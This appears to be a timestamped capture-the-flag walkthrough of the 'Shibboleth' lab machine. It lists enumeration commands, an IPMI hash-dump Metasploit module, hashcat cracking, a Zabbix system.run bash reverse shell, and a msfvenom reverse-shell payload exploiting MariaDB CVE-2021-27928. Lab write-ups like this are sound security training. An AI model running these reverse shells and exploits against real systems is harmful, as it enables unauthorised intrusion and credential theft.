Multiple vulnerabilities.
There’s so many things included, spent many hours working on things did not lead to flags.
Still, everything is enlightening.
00:30 feroxbuster
feroxbuster -u http://shibboleth.htb/ --force-recursion -C 404,405 -m GET,POST
00:48 wfuzz for sub domains
wfuzz -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hw 26
Added –hw 26, as there’s too many Word 26 thing.
01:06 Search for Bare Metal BMC automation
Restrict IPMI traffic to trusted internal networks. Traffic from IPMI (usually UDP port 623) should be restricted to a management VLAN segment with strong network controls. Scan for IPMI usage outside of the trusted network and monitor the trusted network for abnormal activity.
sudo nmap -sU -p 623 shibboleth.htb
01:28 IPIM version exploit with Metasploit
reference here
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
01:34 IPMI vulnerability
reference here
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > show actions
...actions...
msf auxiliary(ipmi_dumphashes) > set ACTION < action-name >
msf auxiliary(ipmi_dumphashes) > show options
...show and set options...
msf auxiliary(ipmi_dumphashes) > run
01:48 hashcat to crack password
hashcat hashed_pass.txt /usr/share/wordlists/rockyou.txt
02:15 zabbix admin page. Found command exec func.
reference here
03:16 reverse shell
system.run[bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1' ,nowait]
04:09 zabbix config file
cat zabbix_server.conf | grep -v "^#" | grep .
04:18 MariaDB version related vulnerability
mysql -u zabbix -pbloooarskybluh
Reference here
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=9999 -f elf-so -o CVE-2021-27928.so
# Execute the payload
mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'